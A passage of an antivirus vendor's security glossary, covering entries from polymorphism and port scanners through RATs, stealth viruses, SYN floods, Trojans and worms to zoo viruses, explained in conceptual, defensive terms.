One of the most sophisticated forms of polymorphism at the time, in some ways setting the standard against which subsequent polymorphs were judged, was the 'Mutation Engine' (or MtE). It was distributed in the form of an object module which could be linked to the code of a virus body (the code responsible for replication), making that virus polymorphic. More recently, polymorphic viruses have 'benefited' from the advance of 32-bit computing, with some polymorphic engines theoretically capable of reproducing their host virus into 4 billion different forms. Scanning technology has obviously had to evolve well past simple string scanning to deal with such complexity while not labeling every other 'innocent' executable a virus too. <br />
Popularity<br />
Describes the existing or potential frequency of exploitation of the vulnerability. For example:<br />
• 1, 2, 3 Not Popular:<br />
Exploit techniques for the particular vulnerability are not widely known, detailed knowledge of vulnerable systems must be known, or circumstances under which the attack may be successfully exploited are very rare. <br />
• 4, 5, 6, 7 Semi-Popular:<br />
Exploit techniques are fairly well known, and the circumstances under which the attack may be successfully exploited are somewhat common. <br />
• 8, 9, 10 Very Popular:<br />
Exploit techniques are well known, and the circumstances under which the attack may occur are very common.<br />
Port Scanner<br />
<br />
In hacker reconnaissance, a port scan attempts to connect to all 65536 ports on a machine in order to see if anybody is listening on those ports. Ports scans are not illegal in many places, in part because they don't actually compromise the system, in part because they can easily be spoofed, so it is hard to prove guilt, and in part because virtually any machine on the Internet can be induced to scan another machine. Many people think that port scanning is an overt hostile act and should be made illegal. An attacker will often sweep thousands (or millions) of machines rather than a single machine looking for any system that might be vulnerable. Port scans are always automated through tools called Port Scanners.<br />
POST <br />
Power On Self Test. <br />
When a PC is powered up or restarted, the first thing the BIOS does is perform some basic tests for the existence and/or functionality of various hardware components (e.g. whether there is enough RAM to run the rest of the BIOS code, whether there is functional display adaptor with text-mode capabilities, etc). Should any of these tests fail, the BIOS simply beeps to indicate the error, and stops - the machine just freezes. The number of beeps describes which of the sub-system tests failed. Unfortunately, there is no explicit standard between manufacturers (and even between models) for these error codes, so you need to contact technical support or the manufacturers web site to obtain this information. <br />
Prepender <br />
A virus that inserts a copy of its code at the beginning of the code of its victim file is known as a prepender or prepending virus. (c.f. Appender, Cavity Infector, Companion Virus, Overwriter) <br />
Probe Tool<br />
<br />
A tool that explores another system, looking for vulnerabilities. While these can be used by security managers, wishing to shore up their security, the tools are as likely used by attackers to evaluate where to start an attack. An example is an NT Security Scanner.<br />
Proof of Concept <br />
A term broadly applied to mean the first implementation of an idea that had previously only been discussed as a theoretical possibility or concept. In antivirus circles it is commonly used to describe a virus that is the first to infect a given platform or implement a given infection technique. Employed thus, it often has a pejorative connotation, particularly if used in a phrase such as 'It is just a proof of concept' which usually means the virus is very simplistic and possibly quite obvious or buggy (or both), and thus unlikely to pose a real-world threat itself. <br />
Return to top<br />
<br />
<br />
R <br />
<br />
RAM <br />
<br />
Random Access Memory. <br />
The memory transient programs are loaded into so they can be executed. It is also the memory that must be used for revisable data storage, regardless of the location of the program manipulating the data (e.g. a PC's interrupt table is stored at a fixed location in system RAM even though it is initialized and used by the BIOS, because the OS and user programs need to be able to alter interrupts). Viruses must use some of this for themselves if they are to remain active on a machine (i.e. if they are to go resident). Thus, scanners check memory, at least for signs of known memory-resident viruses. <br />
In the early days of virus scanner development, many scanners would declare that a virus was active simply when it is found in RAM. This could, and often did, cause a particular type of false positive known as ghost positives through the 'detection' of part of a virus' code that was, for example, left over in a buffer area of RAM rather than truly being active. (c.f. ROM) <br />
RAT <br />
1. Remote Access Trojan (occasionally Remote Access Trapdoor). <br />
2. Remote Administration Tool. There are legitimate remote administration tools included with many network management products, with helpdesk and other support software, and the like. These are installed with the system administrator's knowledge and consent (although not necessarily with that of the end-users). Many programs that are clearly designed to harass, annoy and spy on unsuspecting users who are fooled into running their server part (that is, programs that better fit the first expansion of this acronym) are referred to as 'remote administration tools' in an attempt (usually by their writers, resellers, agents, etc) to legitimize them. Such tools that have 'silent' installation modes and such useful administration functions as the ability to repeatedly open and close the CD-ROM tray of the 'administered' machine are perhaps better thought of as 'remote antagonism tools' and should be treated as such <br />
Registry<br />
The registry is a database used by the Windows32 operating system (Win9x/ME/NT/2000/XP) to store configuration settings. The Registry is broken down into several major sections, for example; HKEY_Current_User (where all the preferences for the current user are stored) or HKEY_Local_Machine (where settings are stored for hardware, installed applications and the operating system). <br />
<br />
Many Windows applications write data to the Registry. The Registry can be edited, although extreme caution must be used when doing so. Actions such as altering registry settings, deleting files from system areas and modifying the content of system files are difficult and potentially dangerous operations that SHOULD NOT be undertaken unless users are aware of the risks involved.<br />
Experimenting with registry settings is likely to result in lost files and/or unusable programs and can even cause the operating system to become corrupted.<br />
Microsoft defines the registry thus:<br />
"In Windows 32-bit operating systems, the tree-structured hierarchical database where general system hardware and software settings are stored."<br />
(quoted from http://www.microsoft.com/hwdev/GLOSSARY1.HTM#R 23/11/2001)<br />
<br />
Remnant <br />
There are many approaches to disinfecting virus-infected objects. As a result, some people are surprised to learn that not all products remove all traces of a virus when disinfecting. Should this happen, the remaining virus code will not be 'active' - it will not be able to gain control in the flow of execution - so the disinfected object is still 'safe'. These snippets of leftover code are sometimes referred to as remnants. <br />
Because this does happen and not all scanners use the same methods to detect any given virus (just as they do not all use the same methods to disinfect), these remnants may be detected by some scanners. If this happens, it may cause them to raise an alert that the original virus is still present or that a new variant of that virus may have been detected. This is a special form of false positive known as a ghost positive. <br />
Remote Access Trojan <br />
A program that surreptitiously allows access to a computer's resources (files, network connections, configuration information, etc) via a network connection is known as a remote access Trojan, or RAT. Note that such functionality is often included in legitimate software designed and intended to allow such access. For example, software that allows remote administration of workstations on a company network, or that allows helpdesk staff to 'take over' a machine to remotely demonstrate how a user can achieve some desired result, are genuinely useful tools (and even desirable in many settings). The difference between remote access Trojans and remote administration tools is that the latter are designed into a system and installed and used with the knowledge and support of the system administrator's and the other support staff they involve. Remote access Trojans are also commonly referred to as remote access trapdoors and backdoors, although the terms trapdoor and backdoor tend to have their own specialized and slightly different meanings. <br />
Resident<br />
A property of most common computer viruses. A resident virus is one which is normally running and active in the environment in which it is infective. Thus, resident DOS executable infectors load into memory, hook one or more interrupts and remain in memory, waiting for some trigger event such as a file being opened. When the trigger event occurs, the virus' infection code runs, attempting to infect one or more suitable targets (usually the file(s) being processed by the system or function call they have hooked). As boot code is only executed at the very beginning of the boot process, boot viruses have to be resident to have a chance to infect any other targets. The more common macro viruses are also resident, for example, installing themselves into global templates in Word and Excel. (c.f. Direct Action) <br />
Retro-virus <br />
Loosely based on the biological concept with the same name, computer viruses that attack antivirus products are sometimes referred to as retro-viruses. Examples range from including code that is known to cause code emulators to exit early, through disabling loading of well-known antivirus products and disabling resident antivirus products by patching them in memory to deleting the checksum data files of products offering such features. <br />
REVS <br />
Rapid Exchange of Virus Samples list. <br />
A mailing list for antivirus companies, allowing their virus analysis staff to securely send samples of 'emergency' viruses to other antivirus developers and for the lab staff to discuss emerging 'virus emergencies'. REVS member companies are expected to send samples of any 'urgent' viruses they isolate to the mailing list no later than the time they make press releases or other public announcements about such viruses. <br />
Computer Associates is represented on the REVS lists. (c.f. AVED) <br />
ROM <br />
Read-Only Memory. <br />
Apart from its contents normally not being modifiable, ROM is usually also non-volatile. This type of memory is traditionally used to hold a PC's BIOS and little else, although various kinds of 'modifiable ROM' memory technologies, such as EPROM, EEPROM and flash memory, have been used through the years, with flash memory being preferred in recent years. <br />
Return to top<br />
<br />
<br />
S <br />
<br />
Search Hijacker<br />
<br />
Any software that resets your browser's settings to point to other sites when you perform a search. Hijacks may reroute your info and address requests through an unseen site, capturing that info. In such hijacks, your browser may behave normally, but be slower. Search results when such a hijacker is running will sometimes differ from non-hijacked results.<br />
Simplicity<br />
<br />
The amount of effort required to exploit a vulnerability. Some attacks against systems can be more difficult to exploit than others. Some exploits merely require inputting a command string, while others involve compiling code and executing the resulting program under an explicit set of conditions. For example:<br />
• 1, 2, 3 Complex:<br />
Detailed computer security knowledge and experience is required, and exploit techniques are difficult to obtain or execute. <br />
• 4, 5, 6, 7 Simple:<br />
General computer security knowledge is required, and exploit techniques are easily obtained and executed.<br />
• 8, 9, 10 Extremely Simple:<br />
Unskilled attackers can easily obtain and execute exploit techniques. Typically, compiled binaries or GUI exploit tools are readily available.<br />
Slack Space <br />
In more general usage, slack space is the disk space 'wasted' by the difference between a file's real size and the minimum storage unit of the file system storing it. For example, on a FAT32 file system under Windows 9x, disk cluster size may be 4KB (4096 bytes). What this means is that regardless of their actual sizes, all files from 1 to 4096 bytes will remove 4096 bytes of free disk space from the drive as the file system cannot allocate drive space in units smaller than a cluster. Thus, if you created ten one byte files, despite having only stored ten bytes of data, you will have used 40960 bytes of disk space. In a sense this is a waste of 40950 bytes of disk space, which is said to be 'slack space'. (There are solutions to this 'problem' of wasting disk space, such as sub-block allocation methods and the like, and these are employed in more advanced file systems.) <br />
An important thing to be aware of is that few popular operating systems overwrite this unused space between the end of a file and the end of the last cluster the file occupies. Thus, pieces of 'inert' virus code can be found in various kinds of 'slack space'. Whilst this is unlikely to be seen when scanning files, such code may be detected in memory and incorrectly reported as an active infection once the contents of (cluster-sized) disk buffers are copied elsewhere (see Ghost Positive for an example with boot sectors). <br />
There are, however, other kinds of slack space that can be of more significance to virus writers. For example, the internal format of Win32 portable executables (the PE format) is section based, with files consisting of a header and one or more sections containing code, data resources and the like. Each section, including the header, is 'padded out' to the nearest whole multiple of the file alignment size (which is specified in the header). This arrangement means that PE files can contain sections that do not completely fill the last section assigned to them in the file, just as the final cluster assigned to a file may not be filled. Some viruses have taken advantage of this section slack space, perhaps most notably CIH (see also Multiple Cavity Infector). <br />
Slow Infector <br />
Most resident viruses attempt to maximize their hit rate by infecting at least the commonly used programs on a system. Some go so far as to attempt to infect all possible targets (see Fast Infector). However, infecting many targets tends to increase the likelihood of being detected so some resident viruses only infect files as they are modified or created. This beats integrity checking methods, as the addition of a new file or modification of an existing one reported by an integrity checker would normally be expected so the user will ignore the reported change, assuming it to be entirely due to (legitimate) reasons for the file's creation or modification. An early example is the Darth Vader virus. A related, though different, technique for reducing the likelihood of detection is that of the sparse infector. <br />
Slow Mailer<br />
<br />
A slow mailer is a virus that distributes itself from victim machines via e-mail but not in the 'explosive' manner attributed to mass mailers. Ska (aka Happy99) and Kak are classic examples of slow mailers, respectively sending itself once to each addressee the victim sends e-mail to or embedding itself in all outgoing HTML messages the victim sends. Despite the mass mailers such as Melissa and LoveLetter hogging the media spotlight, Ska and Kak are also excellent examples of how slow mailers 'last the distance'. For example, several sources of prevalence statistics show roughly twice as many Kak incidents in 2000 as LoveLetter incidents, with the explosive nature of LoveLetter - then the most prevalent virus in history - seen in the fact that most LoveLetter incidents were recorded in a single month (May). <br />
Slow mailers often have the '@m' suffix to their names, making the additional threat they may pose readily identifiable to the informed. <br />
Slow Polymorphism <br />
A term occasionally applied to polymorphic viruses that only morph their code 'occasionally' rather than each time they replicate, as is more common. This is an 'anti-antivirus research' technique.<br />
Sneakernet <br />
The network of inter-personal contacts that existed before ethernet made LANs commonplace and long before the Internet as we know it today existed. The name is a play on 'sneaker' and 'ethernet' and refers to the sharing patterns seen when data files and programs were mainly distributed and copied between workmates, other professional colleagues and friends via diskette. As all diskettes have boot sectors and most PCs will attempt to boot from a diskette left in a floppy drive, boot sector infectors were the most prevalent viruses when sneakernet was the predominant sharing mechanism. <br />
Sniffer<br />
<br />
A wiretap that eavesdrops on computer networks. The attacker must be between the sender and the receiver in order to sniff traffic. This is easy in corporations using shared media. Sniffers are frequently used as part of automated programs to sift information off the wire, such as clear-text passwords, and sometimes password hashes (to be cracked).<br />
Social Engineering <br />
<br />
1. There are two main ways to obtain technical or administrative information about a computer system. The first is from the machines and systems themselves and the second is from the administrators and users of the machines. Surreptitious or unauthorized attempts to obtain such system information are known as hacking or cracking if the attempt involves obtaining the information from the machines and as social engineering if they involve manipulating or 'tricking' a person into divulging the information. <br />
2. By extension of the previous meaning, the term social engineering is often used to describe the 'tricks' used by mass mailing viruses to entice recipients messages with viral attachments to run (or 'view') those attachments. <br />
SOCKS Proxy<br />
Socks (or "SOCKS") is an IETF standard protocol for TCP/IP-based networking applications. A proxy server (a server that sits between a client application and a real server) can use SOCKS to accept requests from clients so that they can be forwarded across the Internet. Socks uses sockets to represent and keep track of individual connections.<br />
SOCKS proxy servers are widespread, and used legitimately for improving system performance, caching web pages and filtering client requests. Unfortunately, SOCKS proxy servers can also be used for undermining system security; attackers can hide their IP address by "bouncing" their requests off a victim’s computer with an open SOCKS proxy.<br />
SPAM Tool<br />
<br />
Any software designed to extract email addresses from web sites and other sources, remove ""dangerous"" or ""illegal"" addresses, and/or efficiently send unsolicited (and perhaps untraceable) mail to these addresses.<br />
Sparse Infector <br />
<br />
Although not an approach to beat integrity checking, like slow infection methods, sparse infection is also an approach to reduce the chances of early detection. The main idea is to replicate only occasionally; for example, only infecting one in every 100 programs that are executed. Another approach a sparse infector may take to deciding which files to infect is to only target files that meet certain criteria such as having a size divisible by a particular value or with a creation date of a certain day of the month and so on. <br />
Spoofer<br />
<br />
To spoof is to forge your identity. Attackers use spoofers to forge their IP address (IP spoofing). The most common use of spoofing today is smurf and fraggle attacks. These attacks use spoofed packets against amplifiers in order to overload the victim's connection. This is done by sending a single packet to a broadcast address with the victim as the source address. All the machines within the broadcast domain then respond back to the victim, overloading the victim's Internet connection. Since smurfing accounts for more than half the traffic on some backbones, ISPs are starting to take spoofing seriously and have started implementing measures within their routers that verify valid source addresses before passing the packets.<br />
Spyware Cookie<br />
<br />
Any cookie that is shared among two or more unrelated sites for the purpose of gathering and sharing private user information.<br />
Spyware or Spy Ware<br />
A program that gathers information and can be 'silently' installed and run in 'stealth' mode. This kind of software is used to gather information from a user's machine, such as recorded keystrokes (passwords), a list of websites visited by the user, applications installed on the machine, the version of operating system, registry settings, etc. <br />
SR-1 <br />
Service Release 1. <br />
A Service Release is an incremental update and/or bug-fix version of an application, similar to the better-known term Service Pack (or SP). SR-1 is usually of significance in antivirus issues when talking about Word 97 SR-1, as this release introduced some subtle changes to Word's VBA environment that had implications for the replication mechanisms of most Word macro viruses written prior to its release. (See also Class Infector.) <br />
Stealth Virus <br />
Aside from infecting seldom (see Slow Infector and Sparse Infector), some viruses take other steps to make themselves difficult to detect. For example, stealth boot viruses intercept attempts to read the boot sector (where they reside) and return copies of the original boot sector so it is seen as it was prior to infection - the first PC virus, Brain, is an example of this. More sophisticated boot sector stealth also intercepts write functions, preventing the viral code being overwritten and perhaps redirecting such writes to the 'safe' copy of the original boot sector. Stealth file infectors typically hide any file size increases they are responsible for when a file's properties are read from the disk - Number of the Beast and Frodo were early examples. Macro viruses have also attempted many stealth techniques, such as replacing the standard list of macros with a list from which the virus' macros are missing, and preventing users from accessing the Visual Basic Editor. For their stealth functions to work, a virus must be 'resident'. <br />
With executable viruses, this residency means the virus' modifications go undetected by antivirus programs as well as preventing the user from noticing changes (such as in file sizes and the like). However, with macro viruses, such stealth mechanisms only help prevent the user noticing or reporting changes because virus scanners look directly at the document files containing the viruses and are not dependent on internal functions of Word - the only functions a macro virus can usurp - in order to detect these viruses. <br />
In general, to counter stealth mechanisms you must be able to re-establish a 'clean' environment. With boot and program stealth, restarting from a clean system is necessary to ensure there is no possibility of the normal system functions being interfered with. With stealth macro viruses a clean user environment is needed. This can be attained by assuring that all global templates and other code resources that may be loaded during the host application's startup phase, and as a result of loading a (potentially) infected document, do not get a chance to run. <br />
Surveillance<br />
<br />
Any software designed to use a webcam, microphone, screen capture, or other approaches to monitor and capture information. Some such software will transmit this captured information to a remote source. See also Key Logger.<br />
SYN Flood Attack<br />
<br />
In the normal course of a TCP connection, a SYN (TCP connection request) is sent to a target computer. When the target computer receives the SYN, it sends a SYN_RECEIVED message back to the machine that sent the SYN (reading the IP source address of the originating packet). The target computer then waits for the machine that originated the request to send back a SYN_ACK upon receipt of its SYN_RECEIVED message (this SYN-RECEIVED state is saved in a buffer either until the ACK is received or until the request has been waiting for a particular finite period of time and is then purged). When this "three-way" handshake is completed, data can travel freely between the two computers.<br />
During a SYN Flood Attack, a SYN is sent to the target computer, however the source IP address is spoofed. The target computer attempts to send its SYN_RECEIVED message back to the originating IP address of the SYN, however, because the address is spoofed, this message will either be sent to an IP address that does not exist or to a computer that did not send the original SYN (and therefore will ignore this message). When this occurs, the target machine may send several more SYN_RECEIVED messages, and wait for a finite time for a SYN_ACK that will never come, storing this information in a buffer. The more of these spoofed packets that are sent to the target computer, the more system resources that are used on the target computer. Once the limit is reached for a given TCP port, the target computer responds by resetting all further connection requests until system resources are freed. The result of this attack is a Denial of Service.<br />
System Boot Sector <br />
<br />
A seldom used term denoting the boot sectors at the beginning of disk partitions and other logical drives such as floppies and some other removable drives. This term is used in the glossary to denote the set of boot sectors excluding master boot records. <br />
<br />
Return to top<br />
<br />
<br />
T <br />
<br />
Telnet Server<br />
<br />
Software that allows a remote user of a Telnet client to connect as a remote terminal from anywhere on the Internet and control a computer in which the server software is running.<br />
Time Bomb <br />
<br />
A logic bomb with its trigger condition(s) based on absolute or elapsed date or time conditions. <br />
TOM <br />
<br />
Top Of Memory. The end of a PC's conventional memory, which, as a matter of architectural design, was limited to 640KB on most PCs and is always a multiple of 64KB. Early PCs were seldom fully populated with RAM, with 64KB, 128KB and 512KB being common values for very early models. <br />
During startup, the BIOS initializes a value in the BIOS Data Area (BDA) noting, in kilobytes, how much conventional memory it found. Boot sector viruses typically read this value, copy their code to just below the memory location it represents and then decrease the value in the BDA. This means the virus' resident code ends up above the TOM subsequently reported to the operating system or to any programs (boot viruses load before the OS). With OSes such as DOS, this ensures the virus' code is not overwritten, but with some more complex OSes this may not be the case. Monitoring the TOM value in the BDA for unexpected changes can help detect a virus, but there are legitimate reasons for it to change. <br />
It is a common misconception that PCs reporting less than 640KB of conventional memory necessarily have a virus. While it is the case that boot viruses (and many simple DOS executable infectors) steal RAM from the TOM, this is far from the only explanation for less than 640KB being reported. For example, many expansion cards that have their own BIOSes and other common BIOS extensions (such as on SCSI controllers embedded in a PC's main logic board) liberate a small amount of conventional RAM from the TOM for their own purposes (1KB, 2KB and 4KB are common amounts for this). Similarly, many system BIOSes have an option to move the Extended DIOS Data Area (EBDA) to the TOM, accounting for 1KB of RAM if enabled. Further, the various startup modes of Windows 9x and ways of getting to a DOS prompt to discover the TOM setting of a machine can also affect what is reported (for example, a machine in the current author's test network variously reports 640KB, 639KB and 636KB depending whether a straight DOS boot is made, the DOS prompt is accessed from inside Windows and whether safe mode is used or not).<br />
Toolbar<br />
<br />
A group of buttons which perform common tasks. A toolbar for Internet Explorer is normally located below the menu bar at the top of the form. Toolbars may be created by Browser Helper Objects.<br />
Tracking Cookie<br />
<br />
Any cookie that is shared among two or more web pages for the purpose of tracking a user's surfing history.<br />
Trigger <br />
The condition that determines the launching of a virus' or Trojan's payload is usually called the trigger or trigger condition. Trigger is also used as a verb to indicate the activation of a payload. (See also Logic Bomb, Time Bomb; c.f. Immediate Acting.) <br />
Trojan<br />
<br />
By analogy to the wooden horse the Greeks reputedly used to break the siege of Troy, the term Trojan is applied to programs that do something their programmers intended but that the user would not approve of if he knew about it. As with so many central terms in this field, there is considerable debate about phrasing an adequate, operational definition.<br />
In the context of Computer Associates AntiVirus solutions and most of the greater AntiVirus industry, the defining feature of a trojan is that it is a malicious program that is unable to spread of its own accord. <br />
Trojan Creation Tool<br />
<br />
A program designed to create Trojans. Some of these tools merely wrap existing Trojans, to make them harder to detect. Others add a trojan to an existing product (such as RegEdit.exe), making it a Dropper.<br />
Trojan Source<br />
<br />
Source code is written by a programmer in a high-level language and readable by people but not computers. Source code must be converted to object code or machine language before a computer can read or execute the program. Trojan Source can be compiled to create working trojans, or modified and compiled by programmers to make new working trojans.<br />
TSR <br />
Terminate but Stay Resident. <br />
This term is properly used of DOS programs that stay loaded in memory and functional, but allow the user to return to DOS and continue using the PC for other purposes. It is a type of poor person's multi-tasking and in the early days of DOS was very much a black art as several important details of undocumented DOS internals had to be understood before a reliable TSR could be written, and many stability problems were attributed to TSRs. The DOS MEM utility (with the '/C' parameter), and many third-party utilities, can display a list of what TSRs are loaded and have 'followed the rules'. <br />
Return to top<br />
<br />
<br />
U <br />
<br />
Usage Tracks<br />
<br />
Usage tracks permit any user (or their software agent) with access to your computer to see what you've been doing. Such tracks benefit you if you have left the tracks, but might benefit another user as well.<br />
Return to top<br />
<br />
<br />
V <br />
<br />
Virus <br />
<br />
A computer virus is a self-replicating program that explicitly copies itself and that can infect other programs by modifying them or their environment such that a call to an infected program implies a call to a possibly evolved copy of the virus. Note that 'program' takes a fairly liberal interpretation here, involving much more than the 'obvious' application programs (executables) in a typical computer system. Almost any code that is executed or interpreted may be 'virusable' so long as, when running in its normal execution context, that code has write access to some other executable object (note this need not be the same kind of executable object!). <br />
Some not immediately obvious targets for viruses include the boot code in the system boot sectors and MBRs of PC disks and hard drives. These are clearly programs, but are often overlooked because they do not reside in files and thus are not readily accessible to the user, or even 'visible'. Other less than obvious programs include scripting facilities built into applications, either in the form of sophisticated macro languages such as Visual Basic for Applications (VBA), or the simpler procedural languages for automating many applications such as the scripting feature of popular Windows IRC clients like mIRC and Pirch. <br />
Another important feature of viruses is that, unlike their biological namesakes, they need not be parasitic. Various companion infection methods exist and mechanisms that involve altering the behavior of the host program's environment, rather than altering the program itself, can be sufficient to classify a program as viral (so long as it is also self-replicating). <br />
Worms are, in some ways, similar to viruses in that they make copies of themselves. However, there is a deal of disagreement between researchers over how to classify worms. See the worm entry for more discussion of this issue. <br />
When discussing viruses, it is common to hear talk about obvious symptoms and damaging payloads. Some viruses display symptoms, and some cause damage to files in a system they have infected, but neither symptoms nor damage are essential in the definition of a virus. A non-damaging virus is still a virus, not a prank. <br />
There are no 'good' viruses. Viruses are seldom intentionally installed. Users (and, more importantly in corporate settings, system administrators) must be able to control their computers. This requires that they have the power to install and remove software, and that no software is installed, modified, or removed without their knowledge or permission. As viruses are usually surreptitiously self-installed and modify other software in the system without user or administrator awareness, they break these requirements of system administration. Further, their removal can be difficult and costly and viruses will occupy drive space and space on backup media and use CPU cycles and RAM that has not been budgeted for. <br />
Many viruses cause intentional damage. But many more cause damage that may not have been intended by the virus' writer. For instance, when a virus finds itself in a very different environment from that for which it was written, a non-destructive virus can suddenly become very destructive. A good case in point are many common (or formerly common) boot viruses: while a particular boot virus might not contain any code to damage computers running Windows NT, booting an NT machine with such a virus is likely to result in system repairs the user or system administrator may not have been prepared for. <br />
Even if a virus causes no direct damage to a computer, the user's or administrator's inexperience with viruses can mean that damage occurs during the 'clean up' process. Many organizations have shredded floppies, deleted files, and done low-level formats of hard disks in their efforts to remove viruses. Even when removal is done perfectly, with no damage to the infected system or files, it is not normally done when the machine is first infected, and the virus in that machine has had a few weeks to spread. The social costs of infection include a loss of reputation and good will which in a business setting can be significant. <br />
Virus Creation Tool<br />
<br />
A program designed to generate viruses. Even early virus creation tools were able to generate hundreds or thousands of different, functioning viruses, which were initially undetectable by current scanners.<br />
Virus Source<br />
<br />
Source code is written by a programmer in a high-level language and readable by people but not computers. Source code must be converted to object code or machine language before a computer can read or execute the program. Virus Source can be compiled to create working viruses, or modified and compiled by programmers to make new working viruses.<br />
Virus Tutorial<br />
<br />
We don't think there is much need for viruses in today's offices, so we don't think there is much need to learn how to create them. Virus Tutorials explain 'how to'.<br />
Return to top<br />
<br />
<br />
W <br />
<br />
War Dialer<br />
<br />
(demon-dialing, carrier-scanning) War-dialing was popularized in the 1983 movie War Games. It is the process of dialing all the numbers in a range in order to find any machine that answers. Many corporations have desktop computers with attached modems; attackers can dial in order to break into the desktop, and thereafter the corporation. Similarly, many companies have servers with attached modems that aren't considered as part of the general security scheme. Since most security emphasis these days is on Internet-related attacks, war-dialing represents the ""soft underbelly"" of the security infrastructure that can be exploited.<br />
Warhead <br />
Another term for Payload. <br />
Web Bug (1)<br />
<br />
A Web Bug is a device used in html web pages and e-mail that is used to monitor who is reading the web page or e-mail. The name "Bug" is used as, just like a bug in a spy movie, these are small, hidden, difficult to detect eavesdropping devices. Most of the time, you will not even be aware that these bugs exist, as they hide within 1 by 1 pixel html image tags, although any graphic on a web page or in an e-mail can be configured to act as a Web bug. This is not to say that all invisible gifs on web pages are web bugs; some invisible gif files are used for alignment and design purposes.<br />
When you view a page or e-mail that contains a Web Bug, the following information is sent to the Bug's owner:<br />
• Your IP address<br />
• Information regarding the browser you are using<br />
• The time the page or e-mail is viewed<br />
• The URL of the page that the bug is on<br />
• Cookie values<br />
Web bugs can be used by advertising networks to gather and store information on user's personal profiles. They are also used to count the numbers of people visiting particular sites, and to gather information regarding browser usage.<br />
Web Bug (2)<br />
<br />
A Web Bug is a device in html web pages and e-mail that is used to monitor who is reading the web page or e-mail. The name "Bug" is used as, just like a bug in a spy movie, these are small, hidden, difficult to detect eavesdropping devices. Most of the time, you will not even be aware that these bugs exist, as they hide within 1 by 1 pixel html image tags, although any graphic on a web page or in an e-mail can be configured to act as a Web bug. This is not to say that all invisible gifs on web pages are web bugs; some invisible gif files are used for alignment and design purposes.<br />
When you view a page or e-mail that contains a Web Bug, the following information is sent to the Bug's owner:<br />
• Your IP address<br />
• Information regarding the browser you are using<br />
• The time the page or e-mail is viewed<br />
• The URL of the page that the bug is on<br />
• Cookie values<br />
Web bugs can be used by advertising networks to gather and store information on user's personal profiles. They are also used to count the numbers of people visiting particular sites, and to gather information regarding browser usage.<br />
Wild <br />
Also referred to as 'in-the-wild'.<br />
A term that indicates a virus has been found infecting systems in several organizations around the world. Ideally, the term is reserved for viruses that currently are (or, that have been) in the 'top half' of the WildList. This contrasts the virus with those that have only been reported by antivirus researchers, and which are sometimes referred to as 'zoo viruses' or 'collection viruses'. Despite popular hype, most viruses are not 'in the wild' and are unlikely ever to be. (c.f. In the Field, Zoo Virus) CA uses this as a metric to measure the degree of real world spread of a malware threat. This metric, in combination with the Pervasiveness and Destructiveness metric is given the most weight when calculating the overall threat assessment. <br />
Wild Virus <br />
<br />
See In the Wild. <br />
WildList <br />
Although there are many thousands of known viruses, few actually cause any real-world concern, and those that do are often said to be 'in the wild'. However, the term 'in the wild' has been used in many different contexts and with many different shades of meaning. In an attempt to clear this situation up, as it regards computer viruses, antivirus researcher Joe Wells instigated what he called the WildList. Its purpose was to provide a listing of viruses that could (or should) be considered 'in the wild' by set criteria. <br />
The approach chosen was quite simple - from a reasonably sized and distributed group of reporters (comprised of antivirus researchers and other IT professionals working in, or closely with, the antivirus community), collate monthly reports of virus infection incidents that have been verified by the reporter receiving a sample of the virus involved. The criteria applied to counting these reports were equally simple - if two or more reporters claimed to have received two or more independent, sample-verified reports of infection by the same virus, that virus would be listed on the WildList. <br />
In reality, the WildList consists of two parts. Those viruses currently reported and meeting these criteria are listed first (in what is sometimes called 'the top-half of the list'). That is the WildList and such viruses can be said to be 'in the wild'. However, as an indication of viruses that may be 'bubbling under', all viruses reported to have met the 'two or more independent, sample-verified reports' criterion by only one WildList reporter are also listed. This is often referred to as 'the bottom-half of the list' and such viruses can be said to have been 'reported from the field'. <br />
The WildList has been used as a 'reference standard' by many antivirus testing organizations that require 100% detection of acknowledged 'in the wild' viruses for tested products to attain various, 'desirable' certification levels. The list has not, however, been without its critics and it must be acknowledged that the WildList does not list all viruses that have been seen 'in the field'. That it should be such a list is a common expectation of those with different backgrounds where the term is also used (for example, the general computer security community uses the term 'in the wild' and members of that community are accustomed to the term meaning 'an exploit of a security hole has been seen used in a real-world attack'). <br />
An archive of the WildLists and details about the organization that compiles and maintains it are available from http://www.wildlist.org. <br />
<br />
Worm <br />
<br />
The term 'worm' does not have a firm definition, although there is less disagreement over the claim that the 'Internet Worm' (or 'Morris Worm') of 1988 was one of the first and the best-known (at least until W97M/Melissa - see below). Some people use the term 'classic worm' (and a few 'real worm') to distinguish such self-contained programs that break into a system via remotely exploitable security flaws (such as buffer overflows) and self-instantiate (i.e. their replication mechanism, per se, is directly responsible for their code running on new target host systems, rather than requiring some external action such as a user running a program or restarting the system as with viruses). The Ramen and Lion (or '1i0n') Linux worms (that were enjoying some success in April 2001) are 'classic worms', as just described. <br />
However, since the late-1990s the term 'worm' has been widely adopted within antivirus circles as meaning something like 'a virus that spreads via network connections'. However, an immediately obvious weakness of this definition is that most file infectors blithely infect files on any drive available to them, including any on mapped network drives. Thus, given an environment where client machines commonly map network drives (i.e. most corporate LANs), most file infecting viruses would be worms. As the point of the late-1990s adoption of the term 'worm' was to emphasize the additional threat posed by mass mailing viruses, this informal definition was changed to something like 'a virus that overtly spreads via network connections' or 'a virus that overtly spreads via external network connections'. <br />
Worms, under this definition, really came to the fore with the release and widespread distribution of W97M/Melissa.A in late March 1999. In fact, accepting this definition of 'worm', the most common type of worm seen to date is the co-called 'e-mail worm' or mass mailing virus. <br />
Aside from e-mail worms, the open share, or network creeper attack is another form of 'network copying virus' worm. This was probably first successfully implemented in VBS/Netlog. Netlog's attack takes the simple expedient of randomly selecting tracts of the IP network address-space then attempting to connect to a Microsoft Network share named 'C' on whatever machine (if any) happens to be on each of the IP addresses in the chosen network address range. A variation on this is network creeper attack, as seen in ExploreZip and some later 'worms', uses Windows' network enumeration API to find all the machines the host explicitly knows on the network and these are then attacked, thus saving time of not having to try many unknown addresses to find potentially exploitable machines. <br />
Worm Creation Tool<br />
<br />
A program designed to generate worms. Worm creation tools can often generate hundreds or thousands of different, functioning worms, most of which are initially undetectable by current scanners.<br />
Return to top<br />
<br />
<br />
Z <br />
<br />
Zoo Virus <br />
<br />
Those viruses not known to have accounted for any real-world infection incident, or that have been bypassed by computing developments, perhaps despite having once been common, are known as zoo viruses. <br />
Many thousands of trivial, uninteresting viruses are held in antivirus developer virus collections and are widely considered to pose little, if any, real threat. However, they are kept closely guarded to prevent whatever consequences may befall their victims, should they ever be released. As these viruses are not known to have occurred outside such collections, they are likened to rare and exotic animals that are seldom or ever seen other than in nature parks and zoos. The term 'collection virus' is a synonym. (c.f. In the Wild) <br />
